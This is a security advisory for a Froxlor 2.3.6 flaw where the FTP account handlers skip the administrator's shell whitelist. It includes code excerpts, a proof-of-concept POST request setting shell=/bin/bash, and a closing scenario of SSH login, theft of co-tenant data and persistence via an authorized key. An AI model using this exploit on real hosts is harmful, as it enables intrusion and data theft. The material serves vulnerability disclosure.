CVE-2026-41235: Froxlor: shell whitelist bypass grants host shell access

### Summary Froxlor 2.3.6 lets administrators configure `system.available_shells` as the approved shell list that customers may assign to FTP users. However, the server-side FTP account handlers do not enforce that whitelist when processing add or edit requests. As a result, an authenticated customer with shell delegation enabled can submit an arbitrary shell such as `/bin/bash` even when the panel UI only offers more restricted choices. In deployments that use the default `nssextrausers` integration, the attacker-controlled shell is then propagated into the system account database, leading to real host shell access. ### Details The customer-facing FTP account page builds the shell selector from `system.available_shells`, which shows that the product intends the setting to act as the authorization boundary: ```php // customer_ftp.php:138-149 $shells = [ '/bin/false' => '/bin/false' ]; $availableshells = explode(',', Settings::Get('system.available_shells')); if (is_array($availableshells) && !empty($availableshells)) { foreach ($availableshells as $shell) { $shells[trim($shell)] = trim($shell); } } ``` The request handler forwards posted form data directly into the FTP API command implementation: ```php // customer_ftp.php:170-172 if ($action == 'edit' && Request::post('send') == 'send') { $result = $log->logAction(USR_ACTION, LOG_INFO, "edited ftp-account #" . $id); Commands::get()->apiCall('Ftps.update', Request::postAll()); } ``` On the server side, `Ftps::add()` and `Ftps::update()` only perform generic shell string validation. They do not verify that the submitted shell belongs to `system.available_shells`: ```php // lib/Froxlor/Api/Commands/Ftps.php:119-123 if (Settings::Get('system.allow_customer_shell') == '1' && $this->getUserDetail('shell_allowed') == '1') { $shell = Validate::validate(trim($shell), 'shell', '', '', [], true); } else { $shell = '/bin/false'; } ``` The validated shell is stored into `ftp_users.shell` and later consumed by the root-owned cron task that rebuilds NSS extrausers files: ```php // lib/Froxlor/Cron/System/Extrausers.php:89-97 $passwd_entries[] = $user['username'] . ':x:' . $uid . ':' . $gid . ':' . $gecos . ':' . $homedir . ':' . $shell; ``` Because the default installer configuration sets `system.nssextrausers=1`, and the shipped Debian/Bookworm configuration enables `extrausers` in `nsswitch.conf`, the attacker-controlled shell becomes the effective login shell of the generated system user on standard supported deployments. ### PoC An attacker needs a normal customer account and a deployment where customer shell delegation is enabled for that customer. Relevant runtime prerequisites: - `system.allow_customer_shell=1` - the attacking customer has `shell_allowed=1` - the deployment uses `system.nssextrausers=1` with the shipped `libnss-extrausers` integration Froxlor requires a valid CSRF token for POST requests, so the attacker performs the exploit from an authenticated session. Complete PoC flow: 1. Log in as a customer and obtain a valid `csrf_token`. 2. Identify one FTP account owned by that customer. 3. Submit an edit request that sets an arbitrary shell outside the administrator-approved `system.available_shells` list: ```http POST /customer_ftp.php?page=accounts&action=edit&id=17 HTTP/1.1 Host: target.example Content-Type: application/x-www-form-urlencoded Cookie: <authenticated customer session> csrf_token=VALID_CSRF_TOKEN& send=send& id=17& username=test1ftp1& ftp_description=poc& path=/& shell=/bin/bash& login_enabled=1 ``` 4. Wait for Froxlor's master cron to process the queued `REBUILD_NSSUSERS` task. Result: - the request is accepted even if `/bin/bash` is not present in `system.available_shells` - `ftp_users.shell` is updated to `/bin/bash` - `/var/lib/extrausers/passwd` is regenerated with `/bin/bash` as the FTP user's login shell - the attacker can then authenticate to the host using that FTP user's credentials and obtain an interactive shell ### Impact This issue lets a low-privileged customer bypass an administrator-defined authorization boundary and promote an FTP-only account into a real shell account. On shared-hosting systems managed by Froxlor, that materially changes the trust model and can expose the host to lateral movement, local privilege-escalation follow-on attacks, data theft from colocated services, and persistence on the server. Because the vulnerable flow is executed through the normal authenticated web interface and a root-owned provisioning task later materializes the chosen shell at the operating-system level, the vulnerability is stronger than a UI-only restriction bypass.

An attacker operating a standard customer account on a Froxlor-hosted environment — perhaps a small hosting provider running AI inference endpoints or Jupyter notebooks for multiple tenants — identifies that shell delegation is enabled for their account. They log into the customer panel, obtain a valid CSRF token from the FTP management page, and submit a single crafted POST to /customer_ftp.php?page=accounts&action=edit&id=<ftp_id> with shell=/bin/bash in the body. The panel validates only that the shell string is well-formed, accepts the request, and stores /bin/bash in ftp_users.shell. Within minutes, Froxlor's master cron processes the REBUILD_NSSUSERS task, regenerating /var/lib/extrausers/passwd with /bin/bash as the attacker's OS-level login shell. The attacker then SSHs into the host using their FTP credentials, browses co-tenant directories containing model weights, API keys, and training datasets, exfiltrates sensitive AI artifacts, and establishes persistence by dropping an SSH authorized key.